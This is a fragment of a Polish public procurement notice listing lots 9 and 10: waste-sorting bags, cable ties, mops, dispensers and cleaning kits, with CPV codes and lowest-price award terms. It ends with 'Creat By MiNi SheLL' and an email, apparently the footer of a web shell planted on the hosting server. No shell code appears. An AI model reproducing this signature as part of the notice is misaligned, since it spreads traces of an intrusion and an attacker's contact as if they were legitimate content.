<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 39.15.11.00-6.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pakiet 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 9 - WORKI DO SELEKTYWNEJ ZBIÓRKI ODPADÓW
1.	worki polietylenowe 23x50 cm /grubość folii min. 0,025 mm/	czerwone	20 000
2.	worki polietylenowe 50x60 cm /grubość folii min. 0,03 mm/	czerwone	140 000
3.	worki polietylenowe 50x60 cm /grubość folii min. 0,03 mm/	niebieskie	2 000
4.	worki polietylenowe 50x60 cm /grubość folii min. 0,03 mm/	czarne	120 000
5.	worki polietylenowe 70x110 cm /grubość folii min. 0,07 mm/	czerwone	180 000
6.	worki polietylenowe70x110 cm /grubość folii min. 0,06 mm/	czarne	120 000
7.	worki polietylenowe 70x110 cm /grubość folii min. 0,07 mm/	niebieskie	1 000
8.	worki polietylenowe 70x110 cm /grubość folii min. 0,07 mm/	żółte	8 000
9.	Opaski zaciskowe do worków na odpady                          150 x 3 mm	białe	320 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> pakiet 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 10 - DOZOWNIKI, POJEMNIKI, ZESTAWY SPRZĄTAJĄCE
1.	Zestawy dwuwiaderkowe /stelaż metalowy, zestaw na kołach z tworzywa oblewanych gumą/	szt.	40
2.	Mopy 40 cm.na kieszenie /dodatkowe elementy zestawu dwuwiaderkowego/	szt.	200
3.	Kije do stelaży  metalowe /dodatkowe elementy zestawu dwuwiaderkowego/	szt.	50
4.	Stelaże do mopów  40 cm. na kieszenie /dodatkowe elementy zestawu dwuwiaderkowego/	szt.	50
5.	Mopy z patkami 40 cm	szt.	100
6.	Stelaże do mopów  40 cm. z klipsami	szt.	50
7.	Łokciowy dozownik  do płynów dezynfekcyjnych, balsamów oraz mydeł w pojemnikach o poj. 500 ml.	szt.	300
8.	Pojemniki na ręczniki  składane w Z do listków o  wym. 23 x 25 cm	szt.	80
9.	Pojemniki na papier toaletowy, duże     /do papieru toaletowego w rolce 600g /szerokość papieru 10 cm)/          	szt.	60
10.	Uchwyt na papier toaletowy mały z klapką wykonane ze stali /do papieru toaletowego w rolce 100g/	szt.	40
11.	ściereczki do dezynfekcji powierzchni i sprzetu b/pyłowe 4-kolorowe	szt.	23 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com